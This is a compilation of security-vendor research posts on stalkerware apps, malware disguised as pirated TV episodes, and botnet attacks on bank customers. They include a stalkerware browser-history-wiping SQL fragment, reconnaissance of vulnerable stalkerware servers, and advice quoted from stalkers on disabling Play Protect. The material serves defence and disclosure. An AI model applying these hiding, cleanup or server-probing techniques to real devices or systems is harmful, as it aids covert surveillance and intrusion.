The main ‘infection’ vector of stalkerware applications is manual installation, since the attacker needs to register a device after installation by entering license credentials. After this quick configuration process, the stalkerware program is ready to spy on the attacker’s target, and its presence is hidden on the device. This is the case with Mobile Tracker Free:

Moreover, some programs apply additional measures to prevent possible detection by the victim. For example, by masking itself as a system service in the installed applications list:

This masking feature is common behavior among typical Android threats. In special, more secretive cases, stalkerware applications cover up all their tracks. Upon installation, such an application removes the downloaded installer file and clears the browser history, such as the specific web pages related to the program’s distribution. These code chunks illustrate how it works in FreeAndroidSpy stalkerware:

Cleaning up the ‘downloads’ directory

Removing the browser history

The full SQL query used for browser history removing:

url like \’%freeandroidspy.com%\’ or url like \’%spysetup.com%\’ or url like \’%spysetup.co%\’ or url like \’%ytubecache.com%\’ or url like \’%my.spysetup.com%\’

It filters history entries by the specific web pages used to download the FreeAndroidSpy stalkerware installer.

You never know which one is actually on a device

Spyware has established itself as a popular product, and some have become part of different distribution schemes. They might differ by name or the website they can be found on, but they are actually the same product. This is an important point, related to many stalkerware products. There are special programs that allow third-parties to buy franchises and to distribute the product under their own brands, like this one – iSpyoo:

Screenshot from the iSpyoo official site

As a result, we’ve detected a number of iSpyoo samples that are technically the same. Here are two examples of ones we’ve examined: Copy9 (8ac6209894fff56cf2a83f56408e177d) and TheTruthSpy (a20911f85741ed0f96cb4b075b7a32c1).

Both were signed with certificates that have the same issuer/subject:

But further analysis shows the only – but big – difference: they have different C2 server addresses in the same code.

So technically this is the same stalkerware application, but packaged as different products with their own websites, names, marketing strategies and C2 servers.

Both versions of this application has the same user interface:

Obviously, such products have the same server-side part, and this is crucial. If a cyberattacker discovers an exploitable vulnerability in the C2 server of one product, all the other products will be at risk of exposing data as well.

Rather predictably, both TheTruthSpy and Copy9 were hacked in 2018.

Photographs, SMS, WhatsApp chats, call recordings, contacts, and the browser history of thousands of stalkerware victims were leaked to third-parties.

Trusting these applications with your partner’s data puts it at risk of exposure

This brings us on to another important point. As is the case with many spyware programs, they don’t just invade an individual’s privacy, they also store an overwhelming amount of sensitive personal data (in some cases, all of a person’s digitalized personal data) with poor security and a high risk of exposure.

As mentioned above, such programs came to our attention a while ago, and we conducted major research on them in 2017. Back then, we discovered that many had significant security flaws. In particular, we found a critical directory listing vulnerability in SpyMaster Pro:

An incorrect C2 server configuration provided anyone with full access to the victim’s stolen data. Although this vulnerability is now fixed, it comes as no surprise that hackers became very interested this kind of service.

In fact, the past 12 months have shown that there are a lot of known stalkerware product data breaches. For example, there was the MSpy application breach which leaked millions of sensitive records, and not for the first time.

Other widely discussed application data breach cases include the hacking of FlexiSpy, one of the most expensive ($68 per month) programs on the market, and Mobile Spy by Retina-X, which was first breached in 2017 and then again in 2018, with the data shared with Motherboard magazine. This contained intercepted text messages indicating that the program was being used to spy non-consensually on some victims.

Note on Mobile Spy official site

Overall, we found that five out of the 10 most popular stalkerware program families had poor security or had leaked a tremendous amount of personal data due to breaches.

Their infrastructure is questionable to say the least

These breaches were not accidental and begin from security issues in the stalkerware infrastructure. Unfortunately, according to our statistics, there are a lot of C2 servers that contain critical security vulnerabilities that can be exploited by attackers to expose users’ sensitive information.

Besides the critical directory listing vulnerability that we described in a previous publication, we also examined Talklog – a Russian-speaking product.

It’s easy to determine the C2 server address since it is hardcoded into the sample code:

The following directory is forbidden for listing:

But with simple crawling we could find a phpMyAdmin service here – /myadmin:

Its documentation path is available as well, so we could determine the current version of the service:

This is a very outdated version, the current version of phpMyAdmin at the time of our research is 4.8.5.

A simple search in the Offensive Security Exploit Database reveals multiple exploits that could be used to harm or even take control of the C2 server:

Another service that we easily found is SquirrelMail, here – /webmail:

As shown on the login form, it’s version 1.4.23, which, according to the exploit database, seems vulnerable to the Remote Code Execution exploit as well:

This top level analysis, without serious penetration testing procedures, already reveals major security issues within the stalkerware app server that could be exploited by potential attackers and expose the sensitive information of all victims.

You never really know where they come from

Another trait of many stalkerware services is their unknown origins. In the majority of cases, these are far from transparent, to say the least. We don’t know where they come from, who is behind them, who develops these programs and which legislation should be applied to them.

Let’s take MobileTool as a prime example of this. Even though there is a mention of “ltd. OEME-R Technology, Israel” in its company details on its official site, there are a couple of clues that point to the original roots of the service.

Company details

  • The official site is available only in Russian
  • The EULA from the official site contains a mention of “Minsk” – the capital of Belarus
  • Contact information contains a telephone number that is easily attributed to the Velcom operator – a Belarus telephone provider

That number is also linked to a person who tried to sell a house located in Brest on a Belarus property website:

Fun fact: according to the webpage of this application on 4pda.ru, it’s unavailable in Belarus, even though that is the suspected country of origin for the application.

Warning! The service is not available in Belarus! Do not try to avoid this restriction. You will just lose your money.

So, it looks like the developers wanted to avoid some local law with that restriction.

Another example of a program with a suspicious origin is the Spy Phone App. It is registered in Pervolia, Larnaca, Cyprus, an area that has offshore policies and flexible legislation for registered businesses, as well as secrecy laws that protect people’s identities, lenient financial reporting standards and very low taxes.

Their self-protection mechanisms are too aggressive

Even though stalkerware is detected as not-a-virus, these applications have rather aggressive self-protection policies. During our research we observed different self-protection/hiding techniques (some of which have been mentioned above). One of the most notable belongs to the Reptilicus stalkerware application. When it is first launched, it scans all the installed applications and matches them with its hardcoded list:

As we can see, this list contains dozens of names of mobile antivirus products which could detect and remove stalkerware products as they would register as harmful applications. For example, according to VirusTotal, this sample of Reptilicus is detected by 20/59 vendors presented on the service:

If this stalkerware finds an installed antivirus product from this list, a special message will be shown to the user with a request to delete the antivirus product or to whitelist the Reptilicus application:

Conflict applications found, remove it or put application to exclusion list. If you do not do this, our application may work intermittently. Found conflicting applications: Their installation manuals make you not only a stalker but also a cyberfraudster

Another notable trait of almost all stalkerware products is an installation manual that violates many security policies. The Mobile Tracker Free official website has this kind of installation guide and it includes some alarming recommendations.

According to this guide, you must:

  • Enable installations from unknown sources on your phone if you haven’t already done so. “Check the box ‘Unknown sources’. Accept the warning by clicking ‘OK’.”
  • Allow the installation of unknown applications to a mobile browser.
  • Disable Google Play Protect. “Google has added a security system for apps that are not downloaded from Google Play called ‘Play Protect’. It is possible that the Mobile Tracker Free application is detected as potentially dangerous. To prevent the app from being uninstalled, you must disable Google Play Protect and disable notifications related to Google Play Protect.”

This is probably the most horrible mobile security guide that could be presented to a user, as all these steps put a device at risk of being infected by any malware or not-a-virus threats in the future. Moreover, and this is probably the most crucial point here, this guide does not include steps to revert the settings to their original state after installation, so the device on which this software is installed will remain vulnerable.

Their industry has gone way too far

What surprised us most in this research is that, apart from the programs being so easy to find online, they are extremely bold in their promotion and distribution. Forget Darkweb forums or underground markets, developers of these applications have built their own economic environment. They provide different offers for different needs, with tariffs ranging from half a dollar per day to $68/month. Some of them even have their own Twitter account and blogs that are being constantly updated and are apparently managed by dedicated social media managers. The most outrageous programs continue to exist, including the infamous FlexiSpy, described by many as a data-breach catastrophe. In fact, when we researched it, we found a well-kept company blog that was presenting software updates and new features that could be accessed by anyone; along with an active Twitter account.

Moreover, some stalkerware companies are being so open about their practices, that they have an option of delivering a phone with a program pre-installed to the buyer – specifically for those who can’t install the application manually because they lack the technical skills required. This provides the people who run the program with the opportunity to collect information on how skilled their customers are. The Reptilicus app is one of them. According to its official website, this company offers not only a stalkerware application, but an already backdoored phone.

According to statistics from 100% of our users, only 60% can independently configure the device to work properly. If you have any difficulties, or you just have no time to do this, we will do everything ourselves and send you a phone with the installed program.

As the whole stalkerware industry is growing year by year, it has spawned internal competition in an unregulated free-market economy. For example, this is the blogpost about iSpyoo stalkerware published by its competitor – Mspy:


The companies also have a whole mechanism to create fake reviews. This has been done by the Hoverwatch stalkerware service:


There is no need to prove the negative effects that commercial spyware brings, as its initial concept is completely unethical. However, there are many layers of other threats that these programs bring to a user who installs them. They breach the legislation of mobile application stores, breach security and make the data of stalked victims vulnerable to hacker exploitation. Later, that data can be used in all kind of malicious activities – from financial extortion to identity theft. We can also safely say that there are people who benefit from this and can access this data, while their own identities, origins and location remain unknown.

Despite all the findings listed above, most cybersecurity vendors still don’t detect commercial spyware as a threat due to vague legal positioning on commercial surveillance.

However, starting from April 3, 2019, Kaspersky Lab will be notifying its Android users of such programs’ existence on their devices, with a special feature implemented in our Android security app.

All mentioned stalkerware products Name Sample MD5 Official site iOS version MobileTool 7229d6c4ddb571fb59c1402636c962c2 hxxps://mtoolapp[.]net/
hxxps://mobiletool[.]ru/ – iSpyoo 8ac6209894fff56cf2a83f56408e177d (copy9)
a20911f85741ed0f96cb4b075b7a32c1 (thetruthspy) hxxps://ispyoo[.]com/
hxxp://thetruthspy[.]com/ + Talklog 5b20dace9cc15afc9a79332e4377adc2 hxxps://talklog[.]net/ – Spy Phone App bf090ca25d27d2e11dfe64cf0f7b645a hxxps://www.spy-phone-app[.]com/
hxxps://easyphonetrack[.]com/ + Reptilicus 9be7585e88c3697d1689fdd1456c2a52 hxxps://reptilicus[.]net/ + Mobile Tracker Free 847c5f78de89ed4850e705a97a323a1a hxxps://mobile-tracker-free[.]com/ – Hoverwatch 9559138aee33650d10f0810fdeb44b3e hxxps://www.hoverspyapp[.]com/ – Mobile Spy 62bc31db17343049ba70d0f8c9be0ba8 hxxp://www.mobile-spy[.]com/ – FlexiSpy 8514c499f825ca5682a548081c2e6c61 hxxp://www.flexispyapp[.]com + MSpy dee7466c8b58b2687bb003226ac96e6b hxxps://www.mspy[.]com/ + FreeAndroidSpy 1cb261cd82677124e6adac17a59707aa hxxp://freeandroidspy[.]com/ –
2019. április 1.

Game of Threats


While the way we consume TV content is rapidly changing, the content itself remains in high demand, and users resort to any means available to get at it – including illegal and non-ethical ones like the use of pirated stuff. The world is embracing the idea of paying for entertainment more and more with the development of paid subscription networks like Netflix or Apple Music. Yet many countries are still fighting the battle against illegally distributed content. In December 2018, Australia’s Federal Court issued an injunction requiring local internet providers to block 181 pirate domains linked to 78 websites full of files infringing copyright regulations. At the beginning of 2019, Brazil’s Ministry of Justice brought on board the Federal Police of Brazil (Polícia Federal) to launch an anti-piracy operation targeting the illegal distribution of music, movies and TV shows. These are just two of the many initiatives introduced both by governments and the private sector all over the world to combat the problem.

However, despite these measures, copyright-infringing content is still readily available. According to the latest Annual Piracy Report by Muso – a global technology company providing anti-piracy, market analytics and audience connection solutions – the numbers of pirated content consumers are growing. The company registered more than 300 billion visits to pirate websites in 2017 alone. An 1.6% increase from 2016 and an international trend: the US supplied the greatest number of pirate website visitors with 27.9 billion visits per year, followed by Russia, 20.6 billion (a 46% increase from 2016), and India, whose residents visited pirate websites 17 billion times. A major share of pirated content still comes from downloadable files: a 2019 WebKontrol report claims that torrent websites are still leading in Russia in terms of volume of pirated content, followed by file-hosting and streaming services. Moreover, the share of links to illegal content posted on torrent websites grew 14% from 2018 (38% from 24%), overtaking streaming websites.

Being a lucrative source of content, torrents also prove to be a popular way of distributing malicious code, and there are many studies on how cybercriminals exploit that opportunity. According to the results of one such study published in 2015, bootlegged content represents 35% of files shared via BitTorrent, with more than 99% of the analyzed counterfeit files linked to either malware or scam websites. The recent findings by Kaspersky Lab and independent researchers have confirmed the continuation of this trend.

But what kind of content is being targeted? Originally, torrent trackers were the ‘go-to’ places for those seeking pirated versions of games and other software, as well as recent Hollywood blockbusters. Yet in recent years TV shows have become an extremely popular type of content among viewers all around the world – sometimes even more popular than Hollywood movies. According to the Muso report, TV content is clearly of interest to one third of all users consuming copyright-infringing content: TV shows remain the most popular product among users with 106.9 billion visits last year, followed by music (73.9 billion) and films (53.2 billion).

Such popularity has not escaped the eye of cybercriminals, either. To find out exactly how they capitalize on the rise in illegal downloads of TV content, we have researched the landscape of malware threats disguised as new episodes of popular TV shows distributed through torrent websites. Our goal was to see which TV series were the most popular with the malware pushers and to take a closer look at what kind of threats are distributed that way.

Methodology and key findings

To make sure the TV series we focused on were high in demand and sufficiently relevant, we made a list of the most popular TV shows in 2018 using various public sources like IMDB, Rotten Tomatoes and other online ratings sources, plus the most pirated TV shows, also suggesting how popular a particular show may be. We listed a total of 45 titles, but as some of the more popular ones appeared in several different rankings at the same time, we made a few revisions and came up with a final list of 31 TV shows (according to various public ratings like IMDB, Rotten Tomatoes, TorrentFreak, etc., in an alphabetic order).

  1. Altered Carbon
  2. American Horror Story
  3. Arrow
  4. Better Call Saul
  5. Daredevil
  6. DC’s Legends of Tomorrow
  7. Doctor Who
  8. Game of Thrones
  9. Grey’s Anatomy
  10. Homeland
  11. House of Cards
  12. Killing Eve
  13. Legends of Tomorrow
  14. Modern Family
  15. Roseanna
  16. Sharp Objects
  17. Stranger Things
  18. Suits
  19. Supernatural
  20. The Big Bang Theory
  21. The Flash
  22. The Good Doctor
  23. The Good Place
  24. The Handmaid’s Tale
  25. The Haunting of Hill House
  26. The Walking Dead
  27. The X-files
  28. This Is Us
  29. Vikings
  30. Westworld
  31. Young Sheldon

We then ran each title against our threat database. Using aggregated threat statistics from the Kaspersky Security Network (KSN) – the infrastructure dedicated to processing cybersecurity-related data streams from millions of volonteers around the world – we checked whether the users who had agreed to share threat statistics with KSN had ever encountered malware when dealing with the corresponding TV show titles.

Next, we identified the episodes of the most popular TV shows used to diguise malware to find out whether there was any correlation between the number and order of episodes in any given season and the malware pushers’ interest in them.

In addition, we estimated how effective each disguise was, and how succesful a bait each TV show was, as well as the overall potential of the setup as a source of spreading malware. To do that, we divided the total number of unique attacked users by the number of malicious files, and did the same for each TV series. This gave us the average number of users reached by at least one TV show-themed malicious file which, to some extent, allowed us to get at the TV show that worked best as a decoy.

Finally, we looked at what kind of threats are more likely to hit users under the cover of popular series.

These are our key findings:

  • The total number of users who encountered by TV-show-related malware in 2018 is 126,340 globally, one-third less than in 2017. The number of attacks by such malware has seen a decrease of 22% to 451,636 registered attempts
  • The top three TV shows most often used for bait and used to attack the greatest number of users: Game of Thrones, The Walking Dead and Arrow
  • Game of Thrones accounted for 17% of all the infected pirated content in 2018, with 20,934 users attacked, despite being the only TV show in the list that didn’t have new episodes released in 2018
  • The first and the last episodes of each Game of Thrones season we analyzed turned out the most dangerous, accounting for the greatest number of malicious files in Kaspersky Lab’s collection and affecting the most users
  • Winter Is Coming‘ – the very first episode of the show – was the one most actively used by cybercriminals
  • Within two years we detected 33 types and 505 different families of threats hiding behind the Game of Thrones title
  • On average, 2.23 users were attacked seven times per each malware file guised as a TV show
  • American Horror Story proved to be the most effective malware cover – each malicious file hidden behind the title has reached an average of three users
  • Not-a-virus:Downloader and Not-a-virus:AdWare turned out to be two of the most popular threats delivered via TV show content, the most popular one being the dangerous malware type called Trojan
General Overview: malware is coming

The analysis of malicious payloads guised as popular TV series names, and a comparison between the results for years 2017 and 2018, has demonstrated a decrease in the numbers of such malware files, attacks and affected users.

A total of 126,340 users were attacked – one third less than in 2017 (188,769). The decline is smaller than that seen elsewhere For example, a recent report showed that users affected by malware delivered via popular content, including porn, fell by 45% in 2018.

Same as user count, the malware count also declined: in 2017, which was rich for malware, we added 82,091 samples to our database, yet in 2018 that number dropped 30% to 57,133.

Torrent website offering all sorts of pirated content

The total number of attacks detected by our security solutions also dropped, but only by 22%, down to 451,636.

Such a decline might be connected to some of this year’s events potentially affecting the number of torrent file downloads. First, in 2018, Google downranked more than 65,000 torrent websites – major distributors of pirated TV shows – leaving great many users unable to find them when looking for TV series downloads. Active action against torrent websites does make a difference, more and more of them finding themselves blocked or troubled. For example, two major torrent trackers (Pirate Bay and Demonoid) have of late suffered functionality collapses, and one of the world’s longest-standing ones, Leechers Paradise, was shut down for good.

In response, websites streaming pirated copies of movies and TV series are becoming more and more popular, draining the audience from the torrents.

Yet torrents are still running high and – based on our statistics – attempts to harm users are still registered. To measure how effective such malware is, we compared the overall number of unique users attacked with the number of malicious files detected. By dividing the number of users by the number of files we found that every TV show malware file has infected an average of 2.23 users in 2018.

Additionally, we compared the list of the most popular torrents in 2018 with the list of the most infected TV series.

The most popular TV show torrents Top TV shows used to cover up malware The Walking Dead Game of Thrones The Flash The Walking Dead The Big Bang Theory Arrow Vikings Suits Titans Vikings Arrow The Big Bang Theory Supernatural Supernatural Westworld Grey’s Anatomy DC’s Legends of Tomorrow This Is Us Suits The Good Doctor

The most popular torrents of 2018 as reported by TorrentFreak versus the most popular malware-decoy TV series titles

As seen from the table above, six out of 10 TV series are featured on both lists, which we would expect: the more popular a TV show is, the more likely it is to be used by cybercriminals. At the same time, several shows that had been heavily promoted by their makers and were considered to be at the top in terms of popularity – Westworld, DC’s Legends of Tomorrow and a few more – didn’t make it to the top of disguised infections. This, in a way, may reflect the real popularity of these titles.

The M-files: most often infected series

Of course, some TV series are more popular among cybercriminals than others – and threat statistics proves that. To understand which of them attract threat actors the most, we reviewed the number of malware files hidden behind the popular TV show title, the number of times they have attacked users and the number of users affected by such attacks. The leaders turned out to be Game of Thrones, The Walking Dead, Arrow, Suits, Vikings, The Big Bang Theory, Supernatural, Grey’s Anatomy, This Is Us, and The Good Doctor. The latter has replaced House of Cards, which rounded out the top 10 in 2017.

‘Malicious files’ represents the number of unique samples of malware encountered by our users; ‘Attacks’ stands for the number of times our security solutions reported detects, and ‘Users attacked’ means users attacked by TV-series-related malware at least once.

Top 10 TV shows used as a disguise for malware in 2018

Of all the TV series analysed, Game of Thrones had the greatest number of users attacked by malware of the same name – 20,934. It tried to infect users 129,819 times, and the total number of Game of Thrones-themed malware files in our threat collection is 9,986. This makes the show an unmatched leader in popularity not just among users but also among cybercriminals looking for the most effective way to distribute malware.

A year before, in 2017, the wave of Fire and Ice-themed malware was even bigger with almost twice as many users affected and malware files: 42,330 and 19,180, respectively. The number of attacks in 2017 exceeds the 2018 figure by 22% with 167,691 detects.

Top 10 malware disguised as a TV show by the share of users attacked in 2017

Top 10 malware disguised as a TV show by the share of users attacked in 2018

The second place, both in 2017 and 2018, was occupied by The Walking Dead, with 18,794 users attacked, and the third by Arrow (12,163 users). The gap of 380 between the number of users attacked by malware disguised as The Walking Dead versus Game of Thrones seems insignificant. However, we need to remember that Game of Thrones is the only TV series in the top 10 that was not even broadcast during 2018 – the period for which the statistics were gathered.

For comparison, we looked at a similar rankings in 2017 when all three TV shows were releasing episodes live. As seen from the graph below, the difference between Game of Thrones and The Walking Dead was more pronounced, with the number of users attacked by Game of Thrones malware exceeding The Walking Dead and The Arrow figures by 33% and 50%, respectively.

Top three TV shows used as a disguise for online threats

We also took a closer look at sample episodes from the two latest seasons (six and seven) of Games of Thrones and the original first season. The results revealed that the number of infected files spotted by our protection technologies differed significantly from episode to episode. The common theme we were able to spot was that the first and last episodes were used as a disguise for malware each season. Also, the titles of the opening and closing episodes of each season were used the most actively to hide malware compared to other episodes.

Game of Thrones episodes: number of infected files and unique users attacked in seasons 1, 6 and 7

Due to huge time and resource requirements for such an analysis, we did not do any other series. But based on what we have on these three different seasons of GoT, an assumption that other series would be exploited in much the same way would be a safe bet.

But what we can’t assume is that, while the malware disguise reached a significant number of users, it is the most effective method of distribution. As we mentioned earlier, malware files disguised to appear as TV show episodes (no matter which) have hit an average of 2.23 users in 2018. Out of the top 10 TV shows used for cyberattacks, Game of Thrones was only seventh in terms of the proportion of malicious files to the number of affected users. Moreover, it proved to be less effective as an average bait, there being one malicious file disguised as Game of Thrones per every 2.1 users attacked.

We looked at the files to users ratio when analyzing each TV series from the top 10. The files named after The Walking Dead proved to be the most successful, with 2.69 users attacked on average. Second place went to Grey’s Anatomy with 2.65, and third to Supernatural with 2.34.

Later we also checked the remaining TV shows that were analyzed by us but did not make it to the top 10.

Surprisingly, it turned out that the most successful and productive files were hiding behind TV shows that did not make it to the top 10. Each malicious file of the American Horror Story blood line has reached an average of three users in 2018, lifting itself from the fourth place in the 2017 ratings. Back then the top three most effective malware files pretending to be TV shows looked different. Modern Family occupied the third position with 2.95, and Grey’s Anatomy was second with three. Each file of the Big Bang Theory line was able to reach 3.15 users and was topping the list, yet in 2018 it dramatically fell to the eighth position.

Average number of users dealing with TV series-disguised malware files in 2017

Average number of users dealing with TV series-disguised malware files in 2018

Threat Anatomy: attack vectors and types of threats

To investigate what type of TV show-disguised threats are more likely to infect the users’ computers, we extracted infected samples of the most popular TV shows in 2017 and 2018 and counted the different types and families of threats.

We detected a total of 33 threat types and 505 different families hiding behind the Game of Thrones TV show title. The top three most popular threat categories among these were: Trojan, accounting for almost one third of all threats; not-a-virus:Downloader with 21%; and not-a-virus:AdWare with 28%. The ‘not-a-virus’ type of threats are usually not classified as malware, yet such programs may interfere with users’ sessions causing unwanted actions to be performed. AdWare, for instance, can show unsolicited ads, alter search results and collect user data to deliver targeted, contextual advertising.

Top 10 most popular malware types by the share of unique users attacked in 2017-2018

Top 10 most popular malware families by the share of unique users attacked in 2017-2018

As we looked at the statistics of threat types and threat families, we realized that the top-three most popular families represented the three most popular types of threats.

The most widespread threat: Trojans

According to the statistics, the most common type of threat was Trojan. And in 17% of all cases pirated TV shows users had to deal with worms of the Trojan.WinLNK.Agent family. A Trojan is a dangerous type of malware able to cause much harm, from information theft to gaining control of the infected system. The Trojan family pretending to be Game of Thrones that most actively attacked users usually looks like a shortcut to the file and is distributed very differently – usually through emails or questionable websites.

Example of a Trojan disguised as a TV show downloaded to a PC

The common scenario is this: the user downloads a torrent file or receives an archive with a shortcut by email. At first glance the package contains a copy of the long-awaited episode.

Yet, apart from the shortcut, the archive will also contain a hidden folder with the ‘system’ attribute on, making it invisible even if Windows Explorer is configured to display hidden files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

By clicking on the shortcut in hope to watch the video, the user will launch the AutoIt script sitting in the hidden folder along with its interpreter and several other .lnk files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

Example of behavior of a Trojan disguised as a TV show downloaded to a PC. Source: Kaspersky Lab

AutoIt is a worm that spreads through removable disks and runs a backdoor, which is then added to autorun (writing paths to the .lnk files from the hidden folder) and used to accomplish the following actions:

  1. Display a specified message
  2. Execute commands in cmd.exe
  3. Download and launch to% Temp% files
  4. Shutdown/restart computer
  5. Go to a specified URL
  6. Auto-click various webpage items
  7. Terminate, restart, update itself
Not-a-virus rounds up the top three

The second and third place in the rating list of the most popular types of threats and their families are occupied by the not-a-virus families, also known as potentially unwanted software: adware and downloaders.

Example of a PC browser page with AdWare installed. Source: Kaspersky Lab

One of the most popular threat families is not-a-virus:AdWare.Win32.FileTour. Kaspersky Lab classifies it as a type of AdWare. While technically AdWare may represent legitimate software, in many cases users have to deal with file partner programs trying to install partner software and sometimes also download malware to their computers. Unlike not-a-viruses, these threats can vary in type and include malicious miners, password stealers, banking Trojans, and so forth. This happens because the owners of file partner programs often neither know, nor want to check what kind of software they distribute.

Just like not-a-virus:Downloader – another popular not-a-virus threat we will be describing in more detail later – it is distributed through download portals, yet unlike Downloaders it can also be spread through torrent trackers.

Example of an internet page on a PC with adware installed. Source: Kaspersky Lab

Another distinguishing feature of adware compared to the relatively innocent not-a-virus:Downloader is the use of more aggressive strategies. AdWare can trick its way into the users’ devices and play dirty, for instance, by disguising executable files (.exe files) as media (for example, The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe).

Example of an internet page on a PC with adware installed. Source: Kaspersky Lab

The third place is held by the not-a-virus:Downloader threat. This threat type can be completely innocent yet annoying as it will attempt to download utilities. Positioned as software made to simplify downloading files from the internet, the threat is used to distribute the leading malware family hiding behind the Game of Thrones title – MediaGet (we put it in the not-a-virus family: Downloader.Win32.MediaGet) – as well as many others such as uBar, AppDater, etc.

The typical not-a-virus:Downloader distribution scheme is quite simple – the user visits a website in search for a TV show or another media file and sees many different ‘download’ buttons.

Example of a hidden download agreement in not-a-virus:Downloader. Source: Kaspersky Lab

It is very difficult to figure out which one leads to the desired TV episode, so the user often ignores or misses the information displayed like ‘download using the download manager’.

As a result, instead of the video the user gets nothing but a utility-loader through which the content can be potentially downloaded.

Example of a not-a-virus:Downloader. Source: Kaspersky Lab

Downloader utilities themselves are usually quite harmless, yet they are trying to cement themselves firmly into the system and may show unwanted ads or suggest additional unwanted software. This is not dangerous but rather annoying.

Danger Things: how to stay safe

As the world tightens up policies regarding pirated content and treats intellectual property more like physical property, malware distributors seem to be leaving file hosting and torrent websites. But, as we said earlier, this might be due to increased popularity of streaming websites that do not require files to be downloaded, yet might be a source of different threats.

At the same time, we’ve seen that the number of users faced with TV-series-themed malware is still quite large and this threat is proving problematic to those who are looking for free content on the internet. Especially when it comes to extremely popular shows like Game of Thrones, The Walking Dead, Arrow and others. Game of Thrones deserves a special mention as it was one of the very few series which had no new episodes out last year but still topped the malware charts, according to Kaspersky Lab telemetry.

That said, it won’t come as a big surprise to see a new wave of malicious activity accompanying the release of the final season of Game of Thrones in April 2019.

The best way to avoid falling victim of any hostile tactics and make sure you are not hit by a Trojan, which will to zombify your PC, but are going to safely enjoy yet another episode of your favorite TV series, is to use only legitimate sources of content. But even if you do follow that rule, stay alerted as it is quite possible to encounter malicious activity accidentally.

To avoid threats coming from untrusted content distributing platforms, we recommend:

  • Pay close attention to website authenticity and do not visit them unless you are sure they are legitimate
  • Always make sure the website is genuine by double-checking the URL format or company name spelling before you download. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference
  • Pay attention to the extension of the downloaded file. If downloading TV show episodes, the file must not end in .exe
  • Be careful about the torrents you use and do look up the comments about the downloadable files. If comments are unrelated to the content, you are probably looking at malware
  • Don’t click on suspicious links promising exclusive early premiere of the latest episodes; consult the TV show schedule and keep track of it
  • Use reliable security solutions for comprehensive protection against a wide range of threats, such as Kaspersky Internet Security
2019. március 29.

Bots and botnets in 2018

Due to the wide media coverage of incidents involving Mirai and other specialized botnets, their activities have become largely associated with DDoS attacks. Yet this is merely the tip of the iceberg, and botnets are used widely not only to carry out DDoS attacks, but to steal various user information, including financial data. The attack scenario usually looks as follows:

  1. An attempt is made to infect a device with malware (if the botmaster’s aim is financial, a Trojan banker is deployed). If successful, the malware-infected device becomes part of the botnet under the control of a C&C center.
  2. The malware on the infected device receives a command from C&C containing the target mask (for example, the URL of an online banking service) and other data required for the attack.
  3. Having received the command, the malware monitors the actions of the user of the infected device and carries out the attack when that user visits a resource that matches the target mask.

Main types of botnet-assisted attacks are:

Unlike DDoS attacks, which affect the web resources of the victim organization, the attacks investigated in this report target the clients of the organization. The result of a successful attack can be:

  • Interception of user credentials
  • Interception of bank card data
  • Substitution of the transaction addressee (for example, the recipient of a banking transaction)
  • Another operation performed without the user’s knowledge, but in their name

Such scenarios are valid not only for the user’s bank accounts, but for other services too, as we shall see later.


Kaspersky Lab tracks botnet actions using the Botnet Monitoring technology, which emulates infected computers (bots) to obtain real-time data on the actions of botnet operators.

This analysis includes unique attacks registered by Botnet Monitoring in 2017 and 2018 and revealed by analysis of intercepted bots’ configurational files and C&C command.

The attack target is the URL mask, extracted from the bot configuration file or the intercepted command (for example, the URL mask of an online banking site).

The ‘malware family’ in this report refers to publicly known names of malware, for example, ZeuS, TrickBot (Trickster), Cridex (Dridex, Feodo, Geodo, etc.), Ramnit (Nimnul).

Examples of target masks contained in registered commands

A unique attack in this analysis is taken as the unique combination of the target mask and the malware family (or its modification) that received the attack command. The rest of the data (injected scripts, rules for cryptowallets or URLs substitution, traffic redirection rules, patterns for credentials interception, etc.) were not taken into account when determining the uniqueness of an attack.

Excluded from the analysis are attacks related to company resources engaged in developing anti-malware solutions, since such attacks are security measures undertaken by malware to prevent treatment of an infected device (to prevent downloading of a security solution). Besides, we excluded attacks in which could not uniquely identify the target, i.e. it was impossible to obtain additional information about the target from the target mask (for example, the “* bank *” target of the BetaBot is not included in the analysis).

Only the number of unique attacks is taken into account, and not the total number of attacks of each particular family, because different families may receive commands with different frequencies.

The results are based on an analysis of commands from more than 60,000 different C&C centers linked to 150 malware families and their modifications.


The total number of unique attacks on clients of organizations registered by Botnet Monitoring technology in 2018 fell by 23.46% against the previous year (from 20 009 attacks in 2017 to 15 314 in 2018).

At the same time, 39.35% of the attacks we observed in 2018 were new, that is, the combination of the target mask and the family that received the attack command was not encountered in 2017. This is linked to both the emergence of new bankers (Danabot, BackSwap) and the desire of malware creators to change their target scope.

The geography of attacks’ targets in 2017 covered 111 countries; in 2018, attempts were made to attack clients of organizations in 101 countries.

Cybercriminals’ targets

To start with, we will examine the clients of which organizations are cybercriminals’ preferred targets.

In 2017, the largest share of attack targets belonged to the Financial Services category (77.44%). This includes online banking services, multibanking services, online stores, and other resources related to financial transactions (not including cryptocurrencies). This result is to be expected due to the greatest potential gains for the cybercriminals, who in the event of a successful attack gain direct access to the victim’s finances.

In second place by number of unique attacks is the Global Portals and Social Networks category (6.15%), which includes search engines, email services, and social networks. Search engines are placed in this group, because typically the main page of such systems provides a mailbox login form through which intruders try to steal credentials using the types of attacks described above.

Third place in our ranking goes to resources that provide various products and services (5.08%), but are not online stores. For example, hosting providers. In this case, as in the first category, the target is victims’ payment details. These resources are assigned to a separate group, since they offer a specific product or service, which indicates how precise the cybercriminals’ targeting can be.

Distribution of the number of unique attacks by attack target, 2017

Distribution of the number of unique attacks by attack target, 2018

In 2018, there were minor changes in the Top 3 targets of attacks on clients of various organizations. Interestingly, the share of unique attacks on financial services dropped by 3.51 p.p. to 73.93%.

The target mask received by the bot nearly always contains a domain or part of one. After analyzing the domains of masks pertaining to financial organizations (banks, investment, credit, pension institutions, etc.), we compiled a map of organizations whose clients were attacked by bots in 2018. The map indicates the numbers of financial organization domains observed in commands sent to bots.

It should be noted that one organization can own several domains, for example, divided according to a country’s territories.

Domain map of financial organizations observed in target masks, 2018

2018 saw a rise in botmasters’ interest in cryptocurrencies: The number of unique attacks on users linked to cryptocurrency services (exchanges, cryptocurrency wallets, etc.) increased, with their share more than tripling (up 4.95 p.p.) to 7.25%.

